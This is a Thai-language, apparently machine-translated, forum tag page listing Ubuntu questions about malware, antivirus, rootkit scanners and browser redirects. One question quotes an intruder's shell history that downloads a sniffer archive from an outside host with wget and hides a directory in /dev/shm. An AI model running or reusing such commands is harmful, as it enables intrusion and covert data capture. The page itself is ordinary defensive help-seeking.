คำถามติดแท็ก malware

คำถามเกี่ยวกับซอฟต์แวร์ที่เป็นอันตราย

24
ฉันต้องติดตั้งซอฟต์แวร์ป้องกันไวรัสหรือไม่ [ปิด]
ฉันคิดว่าไม่จำเป็นต้องสแกนหาไวรัสใน Ubuntu หรือ Linux distros ใด ๆ จนกว่าฉันจะพบแพ็คเกจสแกนไวรัสclamtkและklamavในศูนย์ซอฟต์แวร์ Ubuntu เมื่อวานนี้ สิ่งนี้นำไปสู่คำถามต่อไปนี้: ไวรัสแตกต่างกันระหว่าง Linux และ Windows อย่างไร กลยุทธ์สำหรับการปกป้องแตกต่างกันระหว่าง Linux และ Windows อย่างไร ควรติดตั้งแพ็คเกจสแกนไวรัสในระบบของฉันหรือไม่? ถ้าเป็นเช่นนั้นซึ่งจะเป็นตัวเลือกที่ดีกว่า
223 malware  antivirus 


1
การแจ้งเตือนว่า“ ไวรัสตัวใหม่กำลังขโมยข้อมูล!” บน Ubuntu 18
เมื่อเร็ว ๆ นี้เมื่อใดก็ตามที่ฉันเปิด Firefox ฉันจะได้รับข้อความในศูนย์การแจ้งเตือน มันไม่ได้เหมือนกันเสมอไปและมันก็เปลี่ยนแปลงอยู่ตลอดเวลา นี่คือตัวอย่าง: มันไม่ได้เป็นแบบนี้เสมอไป มันให้ข้อความอื่น ๆ ด้วยและเมื่อฉันคลิกมันจะส่งฉันไปยังเว็บไซต์ฟิชชิ่ง ฉันไม่รู้ว่าฉันได้รับมันอย่างไร ใครช่วยกรุณากำจัดฉันได้ไหม ฉันลองใช้โปรแกรมป้องกันไวรัสของ Clam แต่ไม่พบอะไรเลย

4
"Wanna Cry" ransomware มีผลกระทบต่อผู้ใช้ Linux อย่างไร
เห็นได้ชัดว่าคุณต้องจ่ายค่าไถ่ $ 300 เพราะ ransomware ที่กำหนดเป้าหมายเป็น Microsoft Windows ได้เข้ารหัสข้อมูลของคุณ ผู้ใช้ Linux ต้องปกป้องอะไรจากขั้นตอนนี้ถ้าเช่นพวกเขากำลังใช้ไวน์ ransomware นี้มีการรายงานอย่างกว้างขวางว่าใช้เครื่องมือที่พัฒนาโดย NSA เพื่อแฮ็คเข้าสู่คอมพิวเตอร์ เครื่องมือ NSA ถูกใช้โดยกลุ่มแฮกเกอร์ที่เรียกว่าเงาโบรกเกอร์ รหัสสามารถพบได้ในGithub Microsoft เปิดตัว patch ( MS17-010 ) กับช่องโหว่นี้ในวันที่ 14 มีนาคม 2017 รายงานการติดเชื้อจำนวนมากได้เริ่มแพร่กระจายในวันที่ 14 เมษายน นี้จะกล่าวถึงที่นี่ เมื่อฉันยังไม่ได้บูท Windows 8.1 ใน 6 ถึง 8 สัปดาห์ฉันจะสามารถใช้ patch นี้จาก Ubuntu โดยไม่ต้องบูท Windows ก่อนได้ไหม (หลังจากการวิจัยอาจเป็นไปได้ว่า ClamAV …
64 windows  wine  malware 

11
ไวรัส Windows สามารถถ่ายโอนไปยัง Ubuntu ได้หรือไม่
ก่อนที่ฉันจะลบ Windows 7 ออกจากคอมพิวเตอร์ของฉันและแทนที่ด้วย Ubuntu ฉันมีภัยคุกคามมากกว่า 257 ตัวที่ไม่เคยหายไปไหน ฉันไม่รู้ว่าม้าโทรจันที่ฉันสามารถถ่ายโอนไปยัง Ubuntu ได้หรือไม่ คอมพิวเตอร์ของฉันติดไวรัสได้หรือไม่ ฉันพยายามระวังอย่างมากเมื่อฉันใช้คอมพิวเตอร์เพราะฉันไม่ต้องการรับคอมพิวเตอร์เครื่องใหม่ ฉันมี Windows 7 และพีซีของฉันเพียงไม่กี่ปี ก่อนอื่นฉันไปที่Best Buyและพวกเขาบอกว่าม้าโทรจันควรจะอยู่ในคอมพิวเตอร์ ชายคนนั้น "ดู" เท่านั้นและเนื่องจากเขาตั้งไว้ในการตั้งค่าจากโรงงานมันจึงซ่อนและขโมยพีซีของฉันสองครั้งติดต่อกัน จากนั้นฉันก็เอามันไปให้คนที่ฉันรู้จักและพวกมันก็สร้างมันขึ้นมาใหม่ แต่มันก็มีปัญหาอีกมากมาย โปรแกรมป้องกันไวรัสและโปรแกรมและไฟล์อื่น ๆ ของฉันหายไปต่อหน้าต่อตา Wi-Fi ของฉันถูกปิดและฉันไม่สามารถเปิดได้อีก มันยังปิดตัวเอง และมันไม่เคยทำแบบนั้นมาก่อน การติดเชื้อของฉันจาก Windows 7 จะถ่ายโอนไปยัง Ubuntu หรือไม่ เพิ่งจำได้ว่าฉันไม่มี windows 7 อีกต่อไปฉันมี Ubuntu เท่านั้น
50 malware 

3
clamav - ข้อผิดพลาด: /var/log/clamav/freshclam.log ถูกล็อคโดยกระบวนการอื่นหรือไม่
ฉันติดตั้งclamavแล้วและต้องการอัปเดตไฟล์ที่ใช้ระบุไวรัส: $ sudo freshclam ERROR: /var/log/clamav/freshclam.log is locked by another process ERROR: Problem with internal logger (UpdateLogFile = /var/log/clamav/freshclam.log). ฉันควรทำอย่างไรกับข้อผิดพลาดนี้ แก้ไข: $ sudo lsof /var/log/clamav/freshclam.log COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME freshclam 866 clamav 3wW REG 259,1 100134 10486045 /var/log/clamav/freshclam.log

3
ไวรัสไวน์ทำงานได้เฉพาะในขณะที่ไวน์กำลังทำงานอยู่หรือไม่
ฉันได้ยินว่า Linux สามารถรับไวรัสผ่านทางไวน์ได้และฉันอยากรู้ว่าไวรัสทำงานได้เฉพาะในขณะที่ไวน์ทำงานหรือไม่ กล่าวอีกนัยหนึ่งฉันสามารถหยุดไวรัสจากการทำสิ่งนั้นได้โดยเพียงแค่เลิกไวน์หรือไม่
42 wine  malware 

4
chkrootkit แสดง“ tcpd” เป็น INFECTED มันเป็นบวกที่ผิดพลาดหรือไม่?
สแกนโดย chkrootkit แสดงให้เห็นว่า "tcpd" เป็น INFECTED แม้ว่าการสแกนโดย rkhunter จะแสดงว่า ok (ยกเว้นผลบวกผิดปกติ) ฉันจะเป็นห่วงไหม? (ฉันใช้ Ubuntu 16.10 กับ 4.8.0-37-generic)

2
พบ SSH Backdoor บน VServer จะทำอย่างไร?
เมื่อวานนี้ฉันตรวจสอบประวัติคำสั่งของฉันใน VServer ของฉัน ฉันพบหลายสายที่น่าสงสัย 195 wget aridan.hol.es/sniffer.tgz 196 tar xvf sniffer.tgz 197 ls -a 198 rm -rf sniffer.tgz 199 rm -rf .sniff/ 200 cd /dev/shm 201 ls -a 202 mkdir " . " 203 ls -a 204 cd " . "/ 205 wget aridan.hol.es/sniffer.tgz 206 tar xvf ar 207 tar …
24 ssh  security  malware 

8
ฉันจะหามัลแวร์ที่ติดตั้งในเครื่องได้จากที่ใด
ฉันต้องการวิเคราะห์กล่อง Ubuntu ของฉันเพื่อตรวจสอบว่ามันถูกแฮ็กหรือไม่ คำถามของฉันคืออะไรคือสถานที่ที่จะค้นพบทั้งหมดหากมีซอฟต์แวร์ที่เป็นอันตรายเริ่มต้นขึ้น ต่อไปนี้เป็นรายการดิบบางชนิด: MBR ภาพเคอร์เนล (ฉันมี md5) / sbin / init (ฉันมี md5) โมดูลเคอร์เนลใน / etc / modules สคริปต์บริการทั้งหมดใน /etc/init.d และ / etc / init (ฉันมี md5) /etc/rc.local การทำงานอัตโนมัติของ gnome และ คำถามของฉันมีความซื่อสัตย์อย่างสมบูรณ์และไม่เป็นอันตราย เพียงเพื่อตรวจสอบว่ากล่องของฉันถูกบุกรุก
23 boot  security  malware 

2
สแกนเนอร์รูตคิตที่ใช้ลายมือชื่อ
ขณะนี้มีสแกนเนอร์รูทคิทเดียวที่ฉันรู้ว่าต้องติดตั้งบนเครื่องก่อนรูทคิทเพื่อให้พวกเขาสามารถเปรียบเทียบการเปลี่ยนแปลงไฟล์ ฯลฯ (เช่น: chkrootkitและrkhunter) แต่สิ่งที่ฉันต้องทำจริง ๆ ก็คือสามารถสแกนเครื่องของฉันและเครื่องอื่น ๆ จาก LiveUSB เพราะถ้ารูทคิทดีพอแล้วมันก็จะเข้ายึดโปรแกรมตรวจจับรูทคิทด้วย ดังนั้นมีสแกนเนอร์รูทคิทที่ใช้ลายเซ็นสำหรับ Ubuntu / Linux ที่ฉันสามารถติดตั้งบน LiveUSB และใช้ในการสแกนเครื่องที่น่าเชื่อถือที่ฉันเสียบเข้าโดยไม่ต้องตรวจสอบพฤติกรรมหรือเปรียบเทียบไฟล์จากวันที่ผ่านมาหรือไม่

6
โปรแกรมป้องกันไวรัสสามารถป้องกันฉันจาก KillDisk มัลแวร์สำหรับ Linux ได้หรือไม่
ญาติของฉันเพิ่งส่งอีเมลถึงฉัน เมื่อเร็ว ๆ นี้เขาได้พบกับหัวหน้าที่น่าตกใจจากผู้จำหน่ายแอนตี้ไวรัส ESET: KillDisk กำหนดเป้าหมายเป็น Linux: เรียกค่าไถ่ $ 250K แต่ไม่สามารถถอดรหัสได้ อีเมลจะอธิบายชิ้นส่วนของซอฟต์แวร์ที่เข้ารหัสเนื้อหาของดิสก์และเรียกร้องค่าไถ่ ญาติของฉันตื่นตระหนกและรู้สึกว่าจำเป็นต้องมีโปรแกรมป้องกันไวรัส ฉันรู้สึกอย่างยิ่งว่าไม่จำเป็นต้องมีโปรแกรมป้องกันไวรัสใน Ubuntu แต่ฉันรู้สึกว่าการป้องกันที่ดีที่สุดสำหรับผู้ใช้ Ubuntu คือการติดตั้งอัปเดตความปลอดภัยทันทีเพื่อสำรองข้อมูลปกติและติดตั้งซอฟต์แวร์จากแหล่งที่เชื่อถือได้เช่น Ubuntu Software Center คำแนะนำนั้นล้าสมัยแล้วหรือไม่กับการมาถึงของ KillDisk?

7
การเปลี่ยนเส้นทางไปยัง“ http://domain-error.com”
ฉันกำลังถูกนำไปยังเว็บไซต์ " http://domain-error.com " สิ่งนี้เกิดขึ้นใน Firefox, Chromium, Google chrome เป็นต้นฉันรู้สึกว่าถูกโจมตีจากไวรัสหรืออะไรทำนองนั้น อัปเดต: การเปลี่ยนเส้นทางเกิดขึ้นค่อนข้างบ่อย แต่ไม่เสมอไปและกำลังประสบกับเบราว์เซอร์ทั้งหมด ตัวจัดการ Firefox Add-ons แสดง "อูบุนตูดัดแปลง 3.2 (ปิดใช้งาน)" ปลั๊กอินของ Firefox แสดง "Codec OpenH264 วิดีโอที่จัดทำโดย Cisco Systems, Inc.1.5.1" /etc/hostsมีดังนี้: 127.0.0.1 localhost 127.0.1.1 home-desktop # The following lines are desirable for IPv6 capable hosts ::1 ip6-localhost ip6-loopback fe00::0 ip6-localnet ff00::0 …


1
ข้อความภาษาอาหรับที่ไม่คาดคิดด้านล่างตัวชี้เมาส์ใน LibreOffice - ไวรัสหรือไม่
นี่มันแปลก วันนี้ฉันเปิดไฟล์ excel ด้วย LibreOffice ทันใดนั้นฉันเห็นเมาส์เปลี่ยนสีและติดอยู่กับข้อความในภาษาอาหรับซึ่งเปลี่ยนทุกวินาทีในการวนซ้ำ ฉันสามารถอ่านภาษาอาหรับได้จริงดังนั้นฉันจึงจำได้ทันทีว่าเป็นข้อความอิสลามที่ยกย่องอัลเลาะห์ (รวมถึงTakbir ) นี่คือภาพหน้าจอ: ตอนแรกฉันคิดว่านี่เป็นสิ่งที่มีไฟล์ แต่จากนั้นฉันเห็นว่าสิ่งนี้เกิดขึ้นกับโปรแกรม LibreOffice ใด ๆ (แต่เฉพาะโปรแกรม LibreOffice) และแม้กระทั่งเมื่อพวกเขาเปิดอยู่มันจะเปลี่ยนเมาส์เมื่อมันอยู่เหนือโปรแกรม LibreOffice เท่านั้น และกลับสู่ปกติทุกที่อื่น ยังติดตั้งใหม่ไม่ได้ ฉันพยายามเรียกใช้ updater ของซอฟต์แวร์ - แต่ฉันมีข้อผิดพลาดที่ไม่สามารถโหลดที่เก็บข้อมูลของ Steam ได้ แต่ดูเหมือนว่าเป็นเรื่องบังเอิญ: Failed to fetch http://repo.steampowered.com/steam/dists/precise/steam/i18n/Translation-en_US Failed to fetch http://repo.steampowered.com/steam/dists/precise/steam/i18n/Translation-en นี่เป็นคำใบ้อีกข้อ - ฉันลองถ่ายภาพหน้าจอหลายข้อความหลายข้อความ แต่พวกเขาทั้งหมดแสดงข้อความเดียวกัน (ข้อความด้านบน) หวังว่านั่นหมายความว่าอะไร ฉันควรทราบว่าฉันยังไม่ได้ติดตั้งอะไรเลยเมื่อเร็ว ๆ นี้และฉันแทบจะไม่เคยใช้ LibreOffice เลย (ฉันชอบ …

โดยการใช้ไซต์ของเรา หมายความว่าคุณได้อ่านและทำความเข้าใจนโยบายคุกกี้และนโยบายความเป็นส่วนตัวของเราแล้ว
Licensed under cc by-sa 3.0 with attribution required.